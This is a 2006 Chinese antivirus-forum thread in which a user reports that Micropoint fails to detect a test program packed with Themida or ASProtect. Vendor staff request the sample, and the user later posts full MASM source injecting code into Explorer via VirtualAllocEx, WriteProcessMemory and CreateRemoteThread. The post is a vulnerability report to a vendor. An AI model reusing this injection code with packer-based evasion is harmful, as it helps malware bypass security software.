微点交流论坛

标题: 微点的特大漏洞 [打印本页]

作者: xor 时间: 2006-12-2 10:27 标题: 微点的特大漏洞

微点对于用themida1.8 asprotect 2.3ske加壳后的程序无法拦截，这两种壳应该都有反api hook,两种壳算是目前最强的，用户很多，希望微点尽快改进！

[ Last edited by xor on 2006-12-2 at 20:36 ]

作者: Legend 时间: 2006-12-2 10:30
微点是依据程序行为判断病毒的，程序有了病毒的行为微点就会处理它的；
请问您具体是怎么测试的？
请问您测试时具体的环境,您的操作系统版本？微点的具体版本？
请把您的这个样本发到virus@micropoint.com.cn我们具体测试分析下。

作者: xor 时间: 2006-12-2 10:35

Quote:

Originally posted by Legend at 2006-12-2 10:30:
请问您测试时具体的环境,您的操作系统版本？微点的具体版本？
请把您的这个样本发到virus@micropoint.com.cn我们具体测试分析下。

那个程序是个我自己做的测试程序是注入explorer进程的，没加壳前微电报告为木马，加了上面两种壳后就拦不到了

环境为winxpsp1

微点最新版
本程序版本： 1.2.10513
特征版本： 1.4.169.061201
更新时间： 2006-12-01 18:33:54

[ Last edited by xor on 2006-12-2 at 10:37 ]

作者: Legend 时间: 2006-12-2 10:40
请把您的这个样本发到virus@micropoint.com.cn我们具体测试下

作者: david1126103 时间: 2006-12-2 11:11

Quote:

Originally posted by xor at 2006-12-2 10:35:

那个程序是个我自己做的测试程序是注入explorer进程的，没加壳前微电报告为木马，加了上面两种壳后就拦不到了

环境为winxpsp1

微点最新版
本程序版本： 1.2.10513
特征版本： 1.4.169.061201
更新 ...

早就1.2.10517了、、、、

作者: xor 时间: 2006-12-2 11:22

Quote:

Originally posted by david1126103 at 2006-12-2 11:11:

早就1.2.10517了、、、、

昨天才升了，现在微点还没有更新，我试过了还是1.2.10513

[ Last edited by xor on 2006-12-2 at 11:26 ]

作者: flo 时间: 2006-12-2 11:48

Quote:

Originally posted by xor at 2006-12-2 10:27:
微点对于用themida1.8 asprotect 2.3skt加壳后的程序无法拦截，这两种壳应该都有反api hook,两种壳算是目前最强的，用户很多，希望微点尽快改进！

呵呵，对themida印象深刻，非常规进Ring0，然后疯狂AntiDebugger，然后又涂IDT又涂SDT，还会Patch内核函数。如果用OllyDbg，themida会利用其BUG让它崩溃...
不过话说回来这种BT壳，正常程序不会用的...如果查到这个壳，90%有问题...

[ Last edited by flo on 2006-12-2 at 11:50 ]

作者: xor 时间: 2006-12-2 12:24
现在不带壳的毒少了，建议微点仔细研究一下这些变态壳~~相信你们的汇编能力！

作者: xor 时间: 2006-12-2 17:26

Quote:

Originally posted by flo at 2006-12-2 11:48:
不过话说回来这种BT壳，正常程序不会用的...如果查到 ...

:P梦幻西游就是用themida加的壳的，看下面的保护选项简直无敌~~
感觉根本就不像正当软件，poly meta 都用上了

附件 1: 未命名.JPG (2006-12-2 17:26, 81.84 K,下载次数： 40)

作者: Legend 时间: 2006-12-2 17:34
xor
您的邮件已经收到；
经官方测试你发的样本在运行时自身存在bug没有成功运行，所以微点没有报警；

作者: xor 时间: 2006-12-2 17:51

Quote:

Originally posted by Legend at 2006-12-2 17:34:
xor
您的邮件已经收到；
经官方测试你发的样本在运行时自身存在bug没有成功运行，所以微点没有报警；

其实那不是bug,使我故意这麽设置的，运行后会出现themida的logo，单击一下logo程序就正式运行了，注入并创建远程线程后运行的代码会造成内存读写错误！还有一点，themida demo版加壳的程序只能运行20分钟！

我再发一个用themida加壳的给你们

代码如下：
.586
.model flat,stdcall
option casemap:none

include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\windows.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

.data

wndname db 'Program Manager',0
wndclass db 'Progman',0

pid dword 0
hp dword 0
.code

start proc

push offset wndname
push offset wndclass
call FindWindow

push offset pid
push eax
call GetWindowThreadProcessId

push pid
push 0
push PROCESS_ALL_ACCESS
call OpenProcess
mov hp,eax

push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push len
push 0
push eax
call VirtualAllocEx
push eax

push 0
push len
push offset bug
push eax
push hp
call WriteProcessMemory

pop eax

push 0
push 0
push 0
push eax
push 0
push 0
push hp
call CreateRemoteThread

ret

start endp

bug:
xor eax,eax
inc byte ptr [eax]
jmp bug
ret
len=$-bug

end start

[ Last edited by xor on 2006-12-2 at 18:11 ]

附件 1: 未命名.JPG (2006-12-2 18:02, 14.45 K,下载次数： 64)

作者: flo 时间: 2006-12-2 17:53

Quote:

Originally posted by xor at 2006-12-2 17:51:

奇怪昨天测试时还是好的~~有一个用themida加的壳的确存在bug，我马上发一个没有bug的

DEMO版本的问题？

作者: xor 时间: 2006-12-2 17:59

Quote:

Originally posted by flo at 2006-12-2 17:53:

DEMO版本的问题？

不是，当时电脑有点问题~~

作者: xor 时间: 2006-12-3 09:21
微点的反毒工程师星期天休息吗？我昨天重新发的样本，今天怎麽没回复？(没收到邮件或消息)

作者: weizg 时间: 2006-12-3 21:33
关注中

作者: ainibubian 时间: 2006-12-8 23:38 标题: 关注

关注中

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn